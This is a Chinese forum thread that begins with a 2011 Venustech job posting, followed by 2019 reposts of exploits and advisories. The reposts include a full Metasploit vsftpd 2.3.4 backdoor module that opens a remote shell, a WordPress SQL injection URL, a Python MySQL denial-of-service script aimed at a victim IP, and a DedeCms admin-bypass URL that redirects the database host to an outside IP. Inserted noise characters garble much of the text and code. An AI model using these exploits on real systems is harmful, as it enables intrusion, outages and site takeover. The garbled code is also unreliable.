Board logo

标题: [人才招聘] [招聘] 启明星辰研发招聘 [打印本页]

作者: 小妍    时间: 2011-3-4 13:57     标题: 启明星辰研发招聘

站内发信给我就行了。
6 n% ~  @' t" o- `8 B7 X3 e( e% }( q

一、研发中心:Linux C软件工程师(若干)

岗位职责:

1.2 u% T# ?: }! I! y( @
安全网关,防火墙,IPS等嵌入式设备软件开发,维护

岗位要求:

1.
7 d2 ^' l# Z7 m' _精通C语言编程

2.
- l0 ?% o2 x- Q熟练使用Linux操作系统,精通 Linux下C语言编程

3.
7 }+ ?( ~% v! L0 \2 n精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

4.5 h( Z" J' Q: v: G. f1 z4 [& R1 \
熟悉网络安全协议及路由器、交换机、防火墙等安全设备

5.6 y# ?9 f1 X$ K6 ?
熟悉Linux内核及开发

二、研发中心:测试工程师(若干)

岗位职责:

1.
6 U2 Z* _7 @/ r7 E负责产品的系统测试、集成测试工作

2.( d: k" ^# Y9 [4 M$ S$ y( w" i
负责产品用例的编写,执行、修改

3.
4 e7 B: J! G/ M7 Y- x负责产品性能的测试

4.
  Q* v& t2 a0 p$ b, h负责对外项目的支持和测试工作

岗位要求:

1.6 `/ g' x- ?3 C& X" ?
掌握基本的tcp/ip知识

2.
) d" O* ^4 i; Y( R+ e数通基础好

3.
. L; X% k; u; z* b& q对linux有一定的基础

4.
+ \& W+ D; k2 w3 x" F# ^" f. n掌握数据库的搭建和使用

5.
( ~! Z$ S( d/ F至少熟悉一种编程语言C/Perl/VBS/TCL

6.; T; N  u* W3 M
熟悉测试用例设计,熟悉系统测试,熟悉压力测试

7.6 {+ o1 M' [1 y/ N  \! V/ b
熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

8.' J1 @5 n# ~7 z8 a3 K6 n6 D
对网络安全设备在网络中的部署有一定的认识

9.; X$ N) h$ G# W) M' ^+ ]) D% s# v; T- A
掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

三、研发中心:安全事件工程师(若干)

岗位职责:              

1.3 j& C0 V6 d( e2 B) ~
木&马检测服务、WEB漏洞扫描服务的实施

2.
3 }  Z) X9 ~* Q1 @0 P5 a2 }
对服务客户的技术支持

3.
' _" ?4 v) C* @
对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

4.
0 f* ~& j# G1 B  f
对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

5.9 {4 `% }/ ^( p9 I( i# j! u7 W
对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究


作者: hushui8878    时间: 2019-5-27 12:02

VSFTPD v2.3.4 Backdoor 命令执行漏洞
################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
5 Z  u; T1 a4 f* t, Z" d
, o) b: n" h. S  s" C0 l0 n& v% ?+ F1 g4 |: m
) j( I/ t* a9 H, c6 i
require msf/core- Z$ d- u% o3 C6 v$ ~# A$ F

9 v: i. P- A+ t" H3 {' s8 }1 hclass Metasploit3 < Msf::Exploit::Remote
& \+ I3 f' `* X. @Rank = ExcellentRanking
& b% y& z0 T0 c+ K5 m0 Z7 c$ S" R  O( V4 a- ?
include Msf::Exploit::Remote::Tcp
* |" v% x# v3 @7 L  W
( A) r$ r3 T% O0 ~1 O5 Ndef initialize(info = {})
5 {7 O* R6 p% I; Lsuper(update_info(info, M4 k9 V0 @+ v! Q5 R
Name => VSFTPD v2.3.4 Backdoor Command Execution) s6 u* Q3 T9 v2 A. @, n" P
Descript_ion => %q{
9 b( J' G6 L0 WThis module exploits a malicious backdoor that was added to the VSFTPD download
2 ]$ \  o! ]# b* `4 Oarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
6 W- ?; G- x, ^- FJune 30th 2011 and July 1st 2011 according to the most recent information6 [. r0 `$ ^( f% ]/ X7 K) e
available. This backdoor was removed on July 3rd 2011.% _1 S" S" Z8 d) u
}
) `* o3 L% a6 n. c7 A" q) \9 jAuthor => [ hdm mc ]5 c& S7 W8 d& B: A; ~/ o  W& W# \1 E
License => MSF_LICENSE) ^* I( v! _6 `7 y$ T
Version => $Revision: 13099 $
8 V) ^, c/ Z2 n# m6 z) hReferences =>) y  n, R8 _( x2 `$ ~
[
! F7 s4 Q3 i  f' V$ ~[ URL http://pastebin.com/AetT9sS5]
3 V9 e5 b; j& ]# L7 _[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
) h1 [: C5 q8 m" n8 t( @: f- j]$ i$ g( q6 w) A" B) I. O
Privileged => true
& t, r; @7 G, Q. HPlatform => [ unix ]
0 R3 A; q( r  {7 \: I* _9 cArch => ARCH_CMD
. M6 G; L) I7 M& r2 O+ iPayload =>8 E) _3 X  J" t1 U3 @  L5 n* Q
{
- q% ]+ i3 _4 a* B6 c: qSpace => 2000; X; S, m- h( z! S) a% U1 H
BadChars => 1 Z: L( L6 t7 E
DisableNops => true/ b: T" d% B5 F9 E) ?: A
Compat =>
- C8 Y8 F) }2 `4 M{
9 O0 U7 I' m. rPayloadType => cmd_interact
4 m: L" w! ?. Z$ A/ GConnectionType => find0 S; _6 U8 a& N/ N5 g( I
}
" Y4 S0 g9 N3 X# \3 z}
1 f3 y: n; P# D1 CTargets =>
- N+ o: [& q1 i* ^) v1 J[
6 f% Y% ~8 _$ K! E7 `[ Automatic { } ]
: {& H7 m9 u' L: f]1 y! j! }% l4 e/ q
DisclosureDate => Jul 3 2011
; U! S' x5 i& l$ W4 eDefaultTarget => 0))
2 r4 N1 ]' W4 N* t, w( |% N& t1 j0 P+ W% d
register_options([ Opt::RPORT(21) ] self.class)3 Z- i* q( Z' ^2 I9 {, T
end: b' F' W4 ^! X% r7 \3 l

# U8 l7 r5 {& x( ?: E9 Bdef exploit( G! I; C3 C# n" H% j* w* A
7 ]: ]* C: r* c$ R9 I" Y' P
nsock = self.connect(false {RPORT => 6200}) rescue nil7 w! E0 J! I+ x& N
if nsock
: G. r% @5 }0 k$ E* q! [  v1 Aprint_status(The port used by the backdoor bind listener is already open)
& U; i% N9 a/ o% shandle_backdoor(nsock)
  d8 I5 F$ I( s) y) K( ]return
. t5 O" k1 ~. w0 }! fend2 n4 S& L- J4 Q6 o
1 @2 T5 O0 ~6 y$ C  e
# Connect to the FTP service port first
- ~0 `% e2 d" @1 O, iconnect
8 z" R0 Q( m  O8 k7 W/ ?! v2 n4 e) l3 L$ F  P; Y2 {
banner = sock.get_once(-1 30).to_s
1 H+ n1 \* S, k. F( v" a" t, |print_status(Banner: #{banner.strip}). H( @' U" T3 E" j
: ?  t/ ~& v, s) }* n: v. S4 N
sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:). F2 b8 X+ S/ c. `0 ]
)
, L) r. a1 T5 K3 c& p  }& t6 K6 qresp = sock.get_once(-1 30).to_s, |7 x- M' l5 W6 p9 H" w' \
print_status(USER: #{resp.strip})) ?+ k( ~6 f* ?/ G  U1 w
7 i4 C' w- C) c/ e+ Q& I% [
if resp =~ /^530 /
  t8 Y( x; y4 g9 Eprint_error(This server is configured for anonymous only and the backdoor code cannot be reached)4 p4 W0 L& o" J% h9 d' ], N
disconnect
2 Q; k% h' R! g7 n7 Q+ h/ Dreturn
: S9 X0 e. j" |2 Q' r( Aend7 D6 h5 }6 ^. }
& T6 W1 r4 p% z$ p# i& u, [/ x' J
if resp !~ /^331 /
5 y! t$ Z& h$ }) x7 dprint_error(This server did not respond as expected: #{resp.strip})) }! U4 G5 X$ _* |; D7 A' x- N
disconnect- R; R; @+ F- e$ T
return
$ H8 z8 w: F: L9 Rend
+ E0 q8 z$ N  ~. S, X" [6 M* ]1 ]" H
7 {+ r$ C" s$ L+ g" C4 Asock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}# c& \' a1 X# y( S7 j+ o9 j3 o" e
)
1 R' m. j8 t( M' x3 u  Q1 t4 P( e" Y7 [' r* q$ B; a; Q0 J3 J2 ]4 ~$ C
# Do not bother reading the response from password just try the backdoor9 O$ O7 L- J, C6 z- i9 h
nsock = self.connect(false {RPORT => 6200}) rescue nil
  p  |, Q5 E: X0 Z; |if nsock
- C$ B9 _# A1 G: P" k6 Iprint_good(Backdoor service has been spawned handling...)9 c1 \- n+ f' t8 c
handle_backdoor(nsock)
) @2 a  P/ C: ereturn
  t$ X" Y  m0 P0 o# I* `& \end' L$ J) a8 o8 q! c, q2 d
2 H- z* y  O( p: f: \
disconnect
5 b# a) e1 y# o' @" |6 _. r5 g' Q9 n; N# P! J
end4 _; I+ `; n! S, u( K
0 K& P% ~" M; G3 @# i
def handle_backdoor(s)& u- x" {9 X1 m1 s& Y( n

, S4 u% ^; {0 r; T0 U6 O: [s.put(id* [9 L: g3 k& }: J
)3 F# M! y, Z5 V( l+ |3 M( _

% ]) w+ s6 [( J9 lr = s.get_once(-1 5).to_s
# `# j) w& P% h; Lif r !~ /uid=/
7 {! O$ K, n/ G2 F- Xprint_error(The service on port 6200 does not appear to be a shell)2 j9 K4 R0 H, Z$ l
disconnect(s)
% l2 B$ R1 o' k/ ~8 c/ C0 Rreturn
2 ]! \3 y) l, p9 uend8 {8 o5 J4 V. v/ D  F

+ r5 b/ R1 X. G2 ~: cprint_good(UID: #{r.strip})
) h; z2 Q4 T$ X9 b' r# d! W/ g' r
5 }4 ]) j- E1 q" j4 L' a& i5 Bs.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
. w/ l& W; b$ ?handler(s)1 {$ Y* ]  v9 @9 w* m
end
; m% i4 k3 Q% ?- H
* U6 b7 Y4 }) o! {end复制代码% R0 A7 M  _. M( h6 R- B; [

: o! b0 R; [( y2 A
! {- j  z4 j" P, w0 m
% v& m. H* \0 v4 z, a# s7 V* \# \) _8 @8 n, P# I! O; R  J

9 I2 g" Y: [  W* t/ [2 B1 }+ E" u( ~0 w

. Z" k) i( P% @. ?. C8 ?' [2 ?' `+ s2 ^# k& h) a
, c& L/ f+ f) t  g) S
: {- F4 j6 |! @, W; T- T5 r! U
: z! j0 V# f4 t' D% _' S/ O" w

7 y7 Q" w" a0 @3 Y" S% q
/ w  E7 g: p2 v2 z  w
+ w, e* d7 L: N5 L4 z2 }2 \2 V. P9 p" ?& v/ l4 x8 \( |+ p- W4 i
6 I9 r3 L3 a8 \( q! m6 ^# i8 n

7 i. z+ ~4 K  J, f; s( ~
0 G+ Y: P# H: a4 C公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: loye13    时间: 2019-5-29 23:01

WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
1. Description:
! N) Y$ A& `6 v9 S6 ?4 g' G. O: j  ! a1 z' ~; u+ a1 m- l( e% T
     $ M5 p8 f  s9 H3 O& b
  
) H6 l( {9 ~+ n5 n8 w7 pSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
# q8 ~9 C8 u+ Pallows an authenticated user to execute arbitrary SQL commands via the id
' g6 D; \; a3 N* Lparameter to wp-admin/admin.php. 9 u2 [4 s' l& @) w4 T5 H
  
, [. `: g5 r" _/ ?& q* r$ L   
5 a" g/ y( q3 J  
) {0 J1 @: y: Z- s: }* z% O5 q2. Proof of Concept:5 [2 M/ \) o9 _
  , x+ a& i" r  h
   
6 Z$ C# J9 {% t0 q" E$ o5 R  ) m# z) {! n2 d* M8 h" n! x
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id& }7 g8 y5 g7 E! f
=1 AND SLEEP(10)
( T( h- ~5 v1 ^* K3 {9 F- [  ]6 ~- E- v! K
  & j% _6 W4 m. c% |) b
   : a5 u' X& H5 W$ `2 `
  % o* @, c( W: ]' h' a$ C; O7 P
3. Solution:* V. ]( o/ k3 N2 w
  
! G0 X! V$ B" k' W) y; X$ a     2 c2 ^# E7 }6 E4 r' F& ^
  
  b3 R$ g0 s, j) C+ A3 aThe plugin has been removed from WordPress. Deactivate the plug-in and wait
4 ]* m' O" X2 y9 Y/ q, ~for a hotfix.( Q3 Y2 `7 n0 N6 v
  
) ~% |4 ^& W4 u/ o   
; w( J1 ]$ J* x  0 R, [0 U1 \* c
4. Reference:
+ C# j* K2 c/ u6 ^) o- P  6 u! C  i9 M$ M% v9 S
   + M+ `1 w5 v. {* K
  
7 G! `( P. Q! O! U4 }/ j: Jhttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje) t  |, ?  V# Z, F7 Q
ction-sqli/+ |" j: \+ L& z) N! c" Y1 |
  7 y, L% X9 u" i! o5 L$ s
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
( ^) ~8 c) b% ?; t( |3 V/ Y( h6 k
( i3 W- y  K' d% ^+ z2 R6 c/ D
% ~' C, f: a6 T
" U: ^' v. e/ \3 }: x4 C0 d
9 `! x/ T5 k' g/ h' k
6 ~/ T* ^( y1 p$ x- w2 B3 G
+ a9 V4 U: \$ W, P' Y0 n% }. Q1 u; ?+ V% o$ O$ `- l
! Q2 Y- a6 V! \' b# v

+ t& p$ P" V, `/ J: r5 @% q
! i' e) _3 ]* c+ p  ^1 B0 [" h; h: X
+ J6 D+ T, l( w
  t! d3 A2 P6 _5 W7 O
9 F7 Q$ ~4 N: T) h& L/ }# w9 R! S/ N0 u! F. l
$ d. K* t. n  O4 l) t2 `5 i2 ?

  k, y6 W; K1 q: }- g! s' _/ m" E" ?7 [

" V/ x7 D( y/ b7 W0 A5 s' m公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: dg86760517    时间: 2019-6-17 23:01

MySQL 5.5.8 远程拒绝服务漏洞
import socket, sys( A- g6 s9 Q. d+ _7 z

+ f+ A9 B* d/ l. P( y! Tprint ". i. ^6 n5 w+ R6 Z2 [9 z
"
* G9 R+ _& `2 u# x/ mprint "----------------------------------------------------------------"
- o7 t  H- a% S9 u9 M# {; Z$ d2 qprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
* M8 @* p. f, ~$ M. k" }4 b, iprint "| Level Smash the Stack                                         |"+ d* ~  s, C' |+ ?9 h- m# E
print "----------------------------------------------------------------"# o! r) D/ R( F6 a
print "
" w- G1 F0 d$ D6 v: f8 `7 w"
. r6 Q* R, F1 R/ F/ l0 t ; t. A2 p0 C' L
buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
# w) g  z$ f" o2 ]8 N3 I9 n/ c. f- L"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
9 Z2 l. h$ K) y% }% i2 V7 ~" z
6 W* o6 j( S7 k; [+ T+ Z) W* }buf2=("x11x00x00x00x03set autocommit30"); q" J3 `: E+ e) p7 n$ V' V
$ R! r) s) t& ?4 s5 N+ E
def usage():
& R0 t3 P6 R% y7 ~print "usage : ./mysql.py <victim_ip>"
  [3 y7 ^/ m% a7 I  R! P! Qprint "example: ./mysql.py 192.168.1.22"
. `2 _3 J2 M/ P- @6 l  z8 O
4 N' d( I* q" y7 p! l 4 u8 b& i8 i: m( D
def main():
+ f  [# |+ I, Zif len(sys.argv) != 2:
$ f/ }5 t# t$ m/ h$ p0 B+ Eusage()
# K( @! U9 [$ ?" ]/ gsys.exit()9 a# t% j. X) d8 U! p7 t0 T
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ X; B' e8 [7 f8 O; ` & Q- \$ _, R0 g$ F% m9 w
HOST = sys.argv[1]
' \( b+ d* A/ f  y8 L& IPORT = int(3306). w3 v( U& C$ J( R" m/ D
s.connect((HOST,PORT))' G2 U4 K, u5 J2 U: {3 ?
print "
  • Connect"
    ; Z1 f: k. ^7 q% u" ~0 f1 K: M! ^$ C0 cs.send(buf)
    3 g0 z# F4 W# Fprint "
  • Payload 1 sent"* i) o* m: p* J- J) C; `+ j; G
    s.send(buf2), @; ~, i7 |% L% M
    print "
  • Payload 2 sent5 \" p. J- S5 |; [* T$ o4 ~: S6 X) X
    ", "
  • Run again to ensure it is down..
    + a! @' e# i. h  B8 ~! Q+ ]1 V  o& P/ t"
    # o! H8 |$ f" y: Zs.close()
    ( P+ N% M: ~  P' r$ ^3 }$ K " G2 p  q4 i0 _8 }0 S, t) @
    if __name__ == "__main__":% L7 D$ l( u# b, m7 F
    main(). ^. F8 H+ c0 v! O+ y2 N
    - e8 g- K$ N. f/ d+ _& O
    # U8 e9 i+ e( x; L* P

    0 f) X& e" ?) h0 e" ]6 F2 M
    ' {1 [( M' e2 _8 R0 }: N* e; A: V/ ~1 u# k! @
    ) v5 A% ~5 c& H4 A. t6 o5 v
    ( l9 o, P, R0 d
    1 T' X3 f/ Z+ _: H( H: d
    : k8 F$ W7 @. a8 i2 Q

    " ~4 C8 w- ?4 ~: d0 o$ E( O7 X- j7 r

    # B+ w* V: I& R& V# a$ z# @6 _( H, Y/ P: J. A2 L+ d9 b+ b+ y

    8 j7 q  U3 `4 b+ K$ {
    / I& h9 ]# M' f* e
    , `1 @9 v+ `: i3 P. m( o8 o$ G& g2 a# v8 R0 V

    " w" E( ~/ e" ~4 v8 z& M& L; B+ T' E公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 二级菜鸟    时间: 2019-6-20 23:57

    手把手教你装Linux系统-设置虚拟机

    $ L) ~  b7 J0 g1 ?' X! Vhttp://www.sitedir.com.cn/video/4.swf
    # B0 P% T4 j) G) ^) |, A& B  s' J' Y* J- n  [+ {  ?6 p0 }

    # v7 a5 W1 c/ E# q6 s7 z8 |; `
    1 E; M/ n, Q" ]3 c: h( b1 {  K: P( W' D4 A7 D: ~1 W* o7 e, n

      k4 R" C) m9 o4 M# F# _" V3 D) W" j5 G3 q

    3 B1 I. ^0 K. S4 h% z" c' ?, K  Y  Z- m1 S3 G- P% X8 `
    & c5 x/ _% e6 E
    8 b' H, f: ^" g
    : ]. }) `4 D  J
      E; p8 g( e  {  ^8 Q2 h

    . X% \, P. S: E. ^. G# t9 m- e# \0 V6 B
    ) ]' l  n. w, p% T+ n, M
    " k; J% ^; G, j* o  G3 k

    : [* _  ]# ^, m4 D7 R  z
    ) f9 ?: }- \8 u$ K- \% e: G4 r公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: arja    时间: 2019-10-12 23:20

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

      @% b: F$ f# F* }
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    9 z7 E% r5 E+ Z7 Z0 X7 b, c
    此漏洞的前提是必须得到后台路径才能实现
    5 o4 A7 X7 z+ J! e0 e) Z
    官方临时解决办法:
    6 I1 G$ M) C; p" o; o
    找到include/common.inc.php文件,把:
    1 r4 d: g- z/ s" X3 A$ q
        foreach($_REQUEST as $_k=>$_v): a) I* p5 M: a% f
        {. b" B+ E2 [4 F: g
            var_dump($_k);1 A8 [  R% y$ f: c/ ~
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )5 r  B3 y/ O* J( v' V+ `
            {* X- j* u' ^; x& ~9 G5 J& ~7 A
                exit('Request var not allow!');
    # w- T$ m# ~# K/ x' ]' W        }8 L8 ^" G9 A9 ]' S0 I+ U, l6 o
        }

    5 P' F. t/ X9 Z5 Q/ A$ _2 x
    换成:

    ) k7 P7 r( z) e5 K" {
        //检查和注册外部提交的变量4 M$ [. q( i0 ]: n$ ~" e
        function CheckRequest(&amp;$val) {2 L% e" g* A. m4 T0 o5 a5 W8 d' y
            if (is_array($val)) {: }& p% f) {/ o
                foreach ($val as $_k=>$_v) {9 V1 ?0 E; X3 i7 Y  E
                    CheckRequest($_k);
    + @9 j. P4 Y( t4 G                CheckRequest($val[$_k]);4 j% h( q4 ?) I9 T1 ?
                }
    0 e6 t" y+ q  Z        } else- G0 K, k% q4 ?9 h1 r1 w
            {1 b4 }0 v% M- }
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    ! `2 ?. }( e3 ^. X4 d2 e            {
    ; r+ L) @' t. S. {$ v                exit('Request var not allow!');
    7 y% u! {  O% g" Z0 Y            }
    # N: r1 N* W$ {+ D0 T* j+ g+ p; A        }
    2 P6 N4 Z  {) \8 c# {; J* I8 g  ~# S    }
    . N, W& u! a# u0 u7 [, H    CheckRequest($_REQUEST);% c# P0 L7 v0 P  p# h8 }
    ( n! i* B& m, P) b- {5 l7 b# T
    ; v$ \! I+ p5 C
    4 o+ y* [2 F+ i. U  h1 L. G
    ! c# q) `# r8 B. L$ N

    $ y. V: s& s# m) j1 f; P- b5 ~7 [" c! h' ~( ^
    2 \! t! w; X7 v$ j, T& i
    7 J9 C1 H* t  [- C) D$ l
    . c7 f* D" R* e0 J4 k6 p

      K* q9 K; A) c7 |8 P: r, g( X! `' E& y1 E5 m

    + I' x) }/ P3 L
    $ M6 c2 A, }( m, j) q- D/ ]: K' j' P8 J/ E

    1 @- U: W  K, E9 Z! Y
    & O! J; s6 f' t8 y& ~) r; [" G9 b
    5 ]( `: o, s2 @3 C
    3 i$ r8 b; ]/ C$ n, S% m
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 若凋零子爵    时间: 2019-10-14 23:55

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>" ~% J; Y& D$ x* ~7 c/ S' |

    3 d5 x5 @+ i7 lhttp://www.sitedir.com.cn/video/8.swf[/quote]
    3 U  w1 X# T9 @4 L" f
    9 k) x* i" G/ r# f+ }+ V' N' u) k$ e, h: n+ V( e
    " U- f4 P4 f# s& Q, d. B2 N

    / l7 ^6 F4 u" e9 I2 _4 o3 O
    - B5 z  u; O7 b0 u* M( \% H
    9 Z1 U, p; r+ K$ V9 g5 Y/ s5 C; D* q5 p9 N0 t, c* j$ R
    2 G0 [- Z' _; W% Y, O

    " X& h) v1 r' Z, w
      j# }# z  ]9 v0 J4 u7 {" O  b7 X

    7 @6 ~! W$ q" p2 `
    $ t+ U2 g4 x2 j: y# R3 Q! e1 @2 _& S/ G
    1 r2 t3 Q! p. f5 ^/ Y- S  s

    & R# F) t, z' c; r4 e1 J4 U( x$ F6 Y$ c9 \: y

    " S8 M% C, |9 G' b) q/ j4 [# z公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 奶妈    时间: 2019-10-24 23:20

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    9 J6 @$ ]  u3 l6 y( C
    影响版本:
    ) j) S/ i, N* t) {Django 1.2.5: F, z: L' Z1 E$ t
    Django 1.3 beta 1
    4 X+ A% R, ^4 z; W+ I; K( z# A+ [Django 1.2.4
    - W0 h  D0 x6 R6 f9 ?Django 1.2.23 _" s& P- N% f; j, v9 D  h1 Y
    Django 1.2

    * k8 w0 n, g! c4 E4 M
    漏洞描述:

    3 u, I/ m2 c0 g- H- k. x' W3 L! h
    Django是一款开放源代码的Web应用框架,由Python写成。8 |% {- Q2 L& R. [
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    ) D0 b! l, V9 e! ~1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。/ Q( ~0 ?5 u$ J$ }; c
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    . {& ^$ c, m! d, O2 u; E1 E$ N3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    # V- r& c' J# j4 W' X6 m4 `4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    $ T9 D4 J; d& h; H( Q- y
    细节参考:
    ) W3 T# R' D! d3 @https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/* R; f; O- e6 \6 J; K( Z) q
    http://secunia.com/advisories/45939/
    0 `  O" z3 U: e- Y1 k; a
    + `/ G! r4 f" k; M2 h

    9 T( ^- {, |' l( M4 `. F. c8 u. g# n8 r8 i
    0 P6 o, z" q. y' G; x) f  h6 Z

    $ n% s6 k. U2 g, O  [  X( n1 f& }. X, T+ D: e9 \0 @% z5 a4 L

    3 c: V; ~+ v$ M* F  |1 S9 w' y: ^/ y  F& x: l  p
    0 l3 ?, h! h' H6 l9 i8 v3 L* C; [( C
    : Z" S9 |+ a$ o. V) E

    # g" x7 e# ^2 ]+ Y4 C7 s) `* H+ Z1 s9 S$ \
    8 m. x7 ^# V9 {  F3 W, T- ]( y

    ! k$ I0 i9 `1 w$ D9 |
    " _5 [. w" ?: n  ]9 B
    - g; y/ t1 W/ i8 A" P: [( X# l1 H7 X$ q1 |) U" i4 A
    / J, r1 }2 Q; Z& d
    ' W% m- z( o' ]
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 奶妈    时间: 2019-10-29 23:55

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    9 t8 p4 a# A/ d( C2 E3 z; X影响版本: McAfee LinuxShield <= 1.5.11 U4 i& ^1 f( J
    远程攻击: Yes 6 C: r7 Z& _  x& V  g# x$ L
    本地溢出: Yes
    4 O4 Q& k; S* ]背景阅读:: q2 Z/ G$ G* _  i: X
    ===========! |9 ^& D3 G. E, a

    + ?7 s, I1 B: r: y* N7 Q0 r% WLinuxShield detects and removes viruses and other potentially unwanted  y9 i2 c9 }9 w! T
    software on Linux-based systems. LinuxShield uses the powerful McAfee% y$ M) A+ F9 E( [. u: T% N
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our* Y/ g/ s9 z0 i% M9 U
    anti-virus products.
    ) ^, P/ T2 {) x5 R5 t' f' U9 B( r  |/ A! b3 m/ x
    Although a few years ago, the Linux operating system was considered a
    . ]' e! i% O  U" E' D" G% X- l0 p4 Ksecure environment, it is now seeing more occurrences of software
    : z* ^# z7 f# ~$ x. [( |3 }specifically written to attack or exploit security weaknesses in
    - r: |, H, `3 I% D- }Linux-based systems. Increasingly, Linux-based systems interact with
    % q. Q7 M: S  ]/ SWindows-based computers. Although viruses written to attack Windows-' Q4 X  M6 K; j7 b
    based systems do not directly attack Linux systems, a Linux server' }4 s' V5 q; Y8 L: p  u% t
    can harbor these viruses, ready to infect any client that connects to
    ( L5 @! L' ^# k( F2 P6 Bit.& p9 X  @4 E! a5 x
    4 ]! Z: J9 R2 H. b
    When installed on your Linux systems, LinuxShield provides protection. i+ p: }7 Q! C% Y2 C% k7 B
    against viruses, Trojan horses, and other types of potentially
    3 S8 D) f# w' c* u' [- P: ounwanted software.
    - ?' X  r3 e' [5 J' H' o# h0 k6 Q; l0 v& J) b/ `
    LinuxShield scans files as they are opened and closed3 {  U- [1 Z6 u% p" ]$ p( V
    ?&amp;#65533;&amp;#65533; a technique5 U: w. {; [9 _4 M/ f7 A9 V
    known as on-access scanning. LinuxShield also incorporates an9 y' ]& @; N0 @5 _' f
    on-demand scanner that enables you to scan any directory or file in
    8 `2 q; V; v4 E+ w2 N% I1 oyour host at any time.2 H% Q9 B9 c+ T( D

    " C8 k. n: h+ F: ZWhen kept up-to-date with the latest virus-definition (DAT) files,
    9 E: \( I* ^7 O# JLinuxShield is an important part of your network security. We
    % G! ?  q/ S4 Z! L1 x$ d5 jrecommend that you set up an anti-virus security policy for your
    9 h( B# g) u3 y* Onetwork, incorporating as many protective measures as possible.3 F- f$ q& j. u  M8 o( z

    % X2 D. J  e# J! ?( \6 r7 fLinuxShield uses a web-browser interface, and a large number of9 E2 V; y  Q- t0 M1 c* h3 G
    LinuxShield installations can be centrally controlled by ePolicy
    ' h- g; g$ R% G0 IOrchestrator.
    / ?1 m- C4 F  u$ I: d, A
      w" l' [3 q* `5 Y4 g  r(Product description from LinuxShield Product Guide)
    % A8 f0 R  W$ W, g; @; X. o0 Z/ O; p& H* C7 l1 c
    % U# E6 z6 ^0 f4 W! P
    & {. w( T2 M9 i  k0 E4 B
    Description:) O1 R& M# `; W/ p  W. o2 {
    ============
    * Q7 ]/ [7 u% `+ D7 f9 P  s3 g& `! x/ z
    This vulnerability allows remote attackers to execute arbitrary code
    : z) l4 Q6 [( |  ^5 ^& bon vulnerable installations of McAfee LinuxShield. User interaction
    # C3 j. S- ~3 O% His not required to exploit this vulnerability but an attacker must* p/ Q$ |5 T, \* J: z% ^  u
    be authenticated./ G& d6 @( Y6 c+ \/ f3 u" q

    . c1 m9 o1 k5 U7 L, FThe LinuxShield Webinterface communicates with the localy installed5 w( V0 {: i! R( h' ~9 [' m
    "nailsd" daemon, which listens on port 65443/tcp, to do
    8 S# |! T  A' @" rconfiguration
    ) L: N* p+ R1 F) L% T) f0 Y2 z' T0 Schanges, query the configuration and execute tasks.- w. g/ {9 O. g0 V8 T9 Q' t
    & I  W2 p% i0 |! \/ @* T
    Each user, which can login to the victim box, can also authenticate
    / P+ h' ?/ T9 u2 F1 V0 s, R4 M& M4 cit self to the "nailsd" and can do configuration changes and
    - [/ {; r: Y3 n0 Iexecute
